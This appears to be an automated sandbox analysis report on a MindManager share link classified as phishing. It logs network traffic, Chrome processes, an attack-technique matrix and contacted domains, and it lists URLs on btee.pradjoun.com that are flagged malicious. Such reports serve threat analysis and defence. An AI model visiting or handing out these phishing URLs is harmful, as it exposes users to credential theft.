      Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
      Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
      Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
      Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
      Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
      Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
      Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
      Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
      Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
      Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.17:49874 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.17:49881 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.23.209.187:443 -> 192.168.2.17:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:50012 version: TLS 1.2
      Source: classification engineClassification label: mal68.phis.win@17/491@76/437
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1960,i,1975966168969992740,16174206318900922862,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1960,i,1975966168969992740,16174206318900922862,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS60%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      about:blank0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        plus.l.google.com
        216.58.206.46
        truefalse
          unknown
          btee.pradjoun.com
          188.114.96.3
          truetrue
            unknown
            us.sharing.mindmanager.com
            108.156.60.35
            truefalse
              unknown
              github.com
              140.82.121.4
              truefalse
                unknown
                cdn.amplitude.com
                18.154.84.60
                truefalse
                  unknown
                  share.mindmanager.com
                  52.58.155.53
                  truefalse
                    unknown
                    stats.g.doubleclick.net
                    64.233.167.157
                    truefalse
                      unknown
                      cloud.mindmanager.com
                      52.58.155.53
                      truefalse
                        unknown
                        code.jquery.com
                        151.101.66.137
                        truefalse
                          unknown
                          d2vgu95hoyrpkh.cloudfront.net
                          108.157.188.81
                          truefalse
                            unknown
                            cdnjs.cloudflare.com
                            104.17.25.14
                            truefalse
                              unknown
                              challenges.cloudflare.com
                              104.17.3.184
                              truefalse
                                unknown
                                www.google.com
                                216.58.206.36
                                truefalse
                                  unknown
                                  d19d360lklgih4.cloudfront.net
                                  13.33.187.96
                                  truefalse
                                    unknown
                                    unpkg.com
                                    104.17.245.203
                                    truefalse
                                      unknown
                                      cdn.cookielaw.org
                                      104.19.178.52
                                      truefalse
                                        unknown
                                        geolocation.onetrust.com
                                        104.18.32.137
                                        truefalse
                                          unknown
                                          objects.githubusercontent.com
                                          185.199.109.133
                                          truefalse
                                            unknown
                                            z5eq.081zq.com
                                            188.114.97.3
                                            truefalse
                                              unknown
                                              cdn.socket.io
                                              unknown
                                              unknownfalse
                                                unknown
                                                ipm.corel.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  ok4static.oktacdn.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    apis.google.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ni0us/0x4AAAAAAAdLo7zOQCu_B31U/auto/normaltrue
                                                        unknown
                                                        https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQtrue
                                                          unknown
                                                          https://btee.pradjoun.com/XUYZ/true
                                                            unknown
                                                            about:blankfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6false
                                                              unknown
                                                              https://share.mindmanager.com/?alid=932187397.1720116268#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6false
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                173.194.76.156
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.78
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.186.67
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                64.233.167.157
                                                                stats.g.doubleclick.netUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.186.170
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                216.58.206.72
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.227
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                216.58.206.36
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.3.184
                                                                challenges.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.17.245.203
                                                                unpkg.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.18.32.137
                                                                geolocation.onetrust.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                185.199.109.133
                                                                objects.githubusercontent.comNetherlands
                                                                54113FASTLYUSfalse
                                                                151.101.66.137
                                                                code.jquery.comUnited States
                                                                54113FASTLYUSfalse
                                                                108.157.188.81
                                                                d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                16509AMAZON-02USfalse
                                                                35.156.199.248
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
